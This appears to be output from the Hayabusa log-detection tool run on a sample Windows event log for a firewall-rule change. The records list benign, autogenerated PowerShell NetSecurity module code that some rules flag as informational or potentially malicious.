+2021-04-23 19:09:45.332 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.333 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.381 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.386 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.386 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.387 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.418 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.418 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.419 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.419 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 